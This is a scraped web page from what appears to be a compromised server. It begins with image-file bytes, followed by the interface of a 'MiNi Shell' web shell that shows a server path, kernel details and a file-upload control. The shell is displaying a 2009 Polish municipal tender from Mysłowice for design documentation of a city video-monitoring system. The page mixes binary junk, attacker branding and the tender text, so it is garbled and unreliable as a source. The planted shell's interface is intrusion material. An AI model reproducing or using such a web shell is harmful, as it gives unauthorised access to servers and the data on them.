JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090513/145254-N-2009.html

<p class="kh_header"><b>Mysłowice: RPO WSL Bezpieczne Mysłowice - monitoring wizyjny miasta - Wykonanie kompletnej dokumentacji technicznej wraz z wykonaniem pełnozakresowej i pełno - branżowej dokumentacji projektowej zawierającej projekty budowlane i wykonawcze wchodzących w zakres rozwiązań zadania: Wykonanie i instalacja systemu monitoringu wraz z adaptacją oraz wyposażeniem Centrum Monitoringu Miejskiego  realizowanego w ramach projektu Bezpieczne Mysłowice - monitoring wizyjny Miasta</b><br>
<b>Numer ogłoszenia: 145254 - 2009; data zamieszczenia: 13.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Mysłowice , ul. Powstańców 1, 41-400 Mysłowice, woj. śląskie, tel. (032) 3171195, faks (032) 2234075.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.myslowice.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> RPO WSL Bezpieczne Mysłowice - monitoring wizyjny miasta - Wykonanie kompletnej dokumentacji technicznej wraz z wykonaniem pełnozakresowej i pełno - branżowej dokumentacji projektowej zawierającej projekty budowlane i wykonawcze wchodzących w zakres rozwiązań zadania: Wykonanie i instalacja systemu monitoringu wraz z adaptacją oraz wyposażeniem Centrum Monitoringu Miejskiego  realizowanego w ramach projektu Bezpieczne Mysłowice - monitoring wizyjny Miasta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji technicznej wraz z wykonaniem pełnozakresowej i pełnobranżowej dokumentacji projektowej zawierającej projekty budowlane i wykonawcze wchodzących w zakres rozwiązań zadania:  Wykonanie i instalacja systemu monitoringu wraz z adaptacją oraz wyposażeniem Centrum Monitoringu Miejskiego realizowanego w ramach projektu Bezpieczne Mysłowice - monitoring wizyjny Miasta. 
Zadaniem Wykonawcy jest w szczególności wykonanie dokumentacji technicznej dla Projektowanego Systemu Monitoringu działającego w oparciu o system dostępu radiowego LMDS oraz Centrum Monitoringu Miejskiego zlokalizowanego w budynku UM Mysłowice przy ul. Powstańców w tym:
a) wykonanie projektu technicznego całego systemu monitoringu szczegółowo określający rozmieszczenie poszczególnych elementów systemu (stacji bazowych LMDS, terminali abonenckich LMDS, kamer, zasilania, radiolinii itp.) łącznie z wykonaniem planowania radiowego na mapie wysokościowej potwierdzonego pomiarami w terenie (projekt ten musi zapewnić bezpośrednią widoczność pomiędzy poszczególnymi elementami systemu),
b) wykonanie projektów budowlanych dla poszczególnych elementów inwestycji, które zgodnie z prawem wymagają uzyskania pozwolenia na budowę wraz z uzyskaniem prawomocnych  pozwoleń - jeśli będą konieczne,
c) wykonanie projektów wykonawczych dla wszystkich elementów inwestycji objętych zamówieniem,
d) wykonanie projektów specjalistycznych, których konieczność opracowania może wyniknąć w trakcie projektowania,
e) wykonanie przedmiaru robot i kosztorysu inwestorskiego,
f) sporządzenie specyfikacji technicznej wykonania i odbioru robot budowlanych,
g) wykonanie informacji dotyczącej bezpieczeństwa i ochrony  zdrowia,  
h) dokonanie wszelkich niezbędnych uzgodnień (branżowych i innych) oraz decyzji potrzebnych do uzyskania decyzji o pozwoleniu na budowę, w tym: 
- uzyskanie od właścicieli poszczególnych nieruchomości wymaganych zgód na instalację danego sprzętu - elementu systemu monitoringu (stacji bazowej LMDS, kamery, terminala abonenckiego LMDS, innych elementów systemu ujętych w dokumentacji projektowej),
- dokonanie uzgodnień w ramach Zespołu Uzgadniania Dokumentacji - jeśli będą konieczne;
- uzyskania decyzji lokalizacji inwestycji celu publicznego - jeśli będzie konieczna;
- uzyskania decyzji środowiskowej i wykonania raportu oddziaływania na środowisko - jeśli będzie konieczna;
i)sporządzenie zestawienia wszystkich urządzeń potrzebnych do prawidłowego funkcjonowania systemu monitoringu warz z określeniem ceny tych urządzeń i kosztów ich instalacji,
j) określenie warunków technicznych uruchomienia, badań i odbioru systemu,
k) określenie warunków utrzymania systemu w okresie gwarancyjnym i pogwarancyjnym,
l) zestawienie planowanych opłat administracyjnych i eksploatacyjnych w skali roku, 
m) pełnienie nadzoru autorskiego nad realizacją prac prowadzonych na podstawie opracowanej przez siebie dokumentacji Nadzór autorski obejmować będzie 10 pobytów na budowie.
Wykonawca zobowiązany będzie zrealizować Zamówienie zgodnie z zasadami współczesnej wiedzy technicznej oraz obowiązującymi normami branżowymi. Dokumentacja wchodząca w zakres Zamówienia zostanie wykonana przez uprawnionych projektantów oraz będzie zgodna z aktualnie obowiązującymi przepisami.
Szczegółowy zakres i założenia projektu, dla którego Wykonawca zobowiązany będzie  wykonać kompletną dokumentację techniczną wraz z wykonaniem pełnozakresowej i pełnobranżowej dokumentacji projektowej zawierającej projekty budowlane i wykonawcze przestawia Część II SIWZ - Umowa oraz Część III SIWZ -Koncepcja techniczno - ekonomiczna i organizacyjna miejskiej sieci szerokopasmowej w mieście Mysłowice.
Projekt Bezpieczne Mysłowice - monitoring wizyjny Miasta ubiega się o współfinansowanie  z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.21.00.00-3, 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 2.000,00 PLN 
Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 2.000,00 pln (słownie: dwa tysiące złotych 00/100).
1. Wadium musi obejmować okres związania ofertą, tj. 30 dni od upływu terminu  składania ofert.
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wniesione w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym zastrzeżeniem, że poręczenie z kasy musi być poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4. W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
5. Wadium wnoszone w formie pieniężnej należy wpłacić wyłącznie przelewem na rachunek bankowy: Urząd Miasta Mysłowice Pekao S.A., nr 25124042271111000048464055.
Wadium musi znajdować się na koncie Zamawiającego w terminie określonym w uPzp, przy czym Wykonawca poprzez załączenie do składanej oferty dowodu wpłaty wykazuje Zamawiającemu, że wpłacenie nastąpiło w czasie niezbędnym do spełnienia wcześniej określonego wymogu.
6. Wadium wnoszone w pieniądzu zachowuje ważność przez cały okres jego przechowywania na rachunku bankowym. Wadium wnoszone w formie niepieniężnej musi być ważne co najmniej od dnia, w którym przypada termin składania ofert, do dnia, w którym upływa termin związania ofertą (jeżeli przypada na dzień ustawowo wolny od pracy, to do pierwszego dnia następującego po dniu ustawowo wolnym od pracy).
7. Oryginał wadium, wniesionego w formie niepieniężnej łącznie z dyspozycją Wykonawcy o wyłączeniu tegoż dokumentu z oferty po zaistnieniu podstaw do zwrotu wadium ,należy dołączyć do oferty.
8. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych we ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
9. Zamawiający zatrzymuje wadium, jeżeli zachodzą przesłanki określone w art. 46 ust. 4a i 5 PZP.
10. Zwrot wadium następuje wg przepisów PZP.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 u.p.z.p., nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 u.p.z.p., lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział wykonawcy, którzy:
1.1 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują lub będą dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (i przedstawią pisemne zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeśli dotyczy) tj.: wykażą, iż:
1.2.1. wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, zamówienia odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia tj.: co najmniej 3 usługi polegające na wykonaniu dokumentacji technicznej systemu monitoringu miejskiego, w tym: 
- wymaga się aby wartość przynajmniej jednej inwestycji, dla której Wykonawca opracował dokumentacje techniczną, wynosiła co najmniej 500.000,00 pln netto,
- wymaga się aby przynajmniej  jedna z inwestycji dla której Wykonawca opracował dokumentacje techniczną dotyczyła systemu monitoringu, w którym do przesyłania sygnału wizyjnego wykorzystano sieć radiowej transmisji danych,
- wymaga się aby przynajmniej  jedna z inwestycji dla której Wykonawca opracował dokumentacje techniczną obejmowała projekt  instalacji bezpieczeństwa centrum monitoringu.
Zamawiający dopuszcza aby ww. szczegółowe wymagania zostały spełnione w ramach 1 lub 2 lub 3 wykazanych przez Wykonawcę usług. zamówienia Wszystkie ww. zamówienia mogą być wykonane w ramach jednego zamówienia
1.2.2. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. wykażą: 
1.2.2.1. posiadanie średniego rocznego przychodu w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) w wysokości nie niższej niż  500.000,00 PLN. 
1.2.2.2. posiadanie środków finansowych lub zdolność kredytową do bieżącego finansowania zamówienia na kwotę  nie mniejszą niż 100.000,00 PLN,
1.2.2.3. posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności, o wysokości sumy ubezpieczenia (określonej w PLN) nie mniejszej niż 50.000,00 PLN.
1.3 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 PZP..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na podstawie art. 44 PZP, wykonawca składa wraz z ofertą:
- oświadczenie na podstawie art. 44 PZP o spełnieniu warunków udziału w postępowaniu (zał. nr 1 do IDW), oraz:
2. w celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 PZP, następujące dokumenty:
2.1 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony(ne) nie wcześniej niż 6 m-cy przed upływem terminu składania ofert;
3. w celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, następujące dokumenty:
3.1 wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich odbiorców, przedmiotu łącznie z określeniem wartości, dat wykonania, nr pozwolenia na budowę, nazwy miejscowości łącznie z podaniem liczby ludności w przypadku miasta, długości kanalizacji i liczby węzłów (zał. nr 2 do IDW) oraz załączenie dokumentów potwierdzających, że dostawy i usługi zostały wykonane należycie; 
4. w celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, następujące dokumenty:
4.1 bilans oraz rachunek zysków i strat (stanowiące część sprawozdanie finansowego), a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego dokumentów określających obroty oraz zobowiązania i należności- za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy- za ten okres.
4.2 informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.3 polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. W przypadku złożenia oferty przez wspólników spółki cywilnej , dokument musi być wystawiony na wspólnika/ów spółki cywilnej
5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia: 
5.1.1. składają oświadczenie o spełnieniu warunków udziału w postępowaniu (zał. nr 1A do IDW),
5.1.2. oddzielnie wykazują, iż posiadają uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlegają wykluczeniu na podstawie art. 24 PZP 
- na potwierdzenie ww. warunku każdy z wykonawców z osobna składa dokumenty, o których mowa w ppkt 1.2.1. 
5.1.3. wspólnie wykazują, iż: 
5.1.3.1. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - w celu potwierdzenia ww. warunków wykonawcy wspólnie przedkładają dokumenty, o których mowa w ppkt 1.2.2. IDW,
5.1.3.2. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - w celu potwierdzenia niniejszego warunku wykonawca/wykonawcy składa/ją dokumenty, o których mowa w ppkt 1.2.3. IDW - Zamawiający dopuszcza możliwość, aby wymagane dokumenty złożył tylko ten wykonawca lub wykonawcy, którzy spełniają wymagany warunek,
5.1.4. obowiązani są załączyć do oferty oryginał pełnomocnictwa lub notarialnie poświadczoną kopię, zgodnie z którym ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Dokument z którego wynika ustanowienie pełnomocnika musi być podpisany przez osobę /osoby/ uprawnioną(e) do reprezentowania z osobna każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z aktualnym odpisem z właściwego rejestru lub zaświadczeniem o wpisie do ewidencji działalności gospodarczej.
5.2 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zobowiązany jest przedłożyć ww. dokumenty zgodnie z wymaganiami określonymi w § 2. 1. rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605) z uwzględnieniem  zmiany wprowadzonych rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniającym rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 188, poz. 1155)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.myslowice.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> jak w pkt I.1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 09:00, miejsce: Oferty należy składać w Wydziale Zamówień Publicznych Urzędu Miasta Mysłowice, 41-400 Mysłowice, ul. Powstańców 1 - pok. nr 305.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com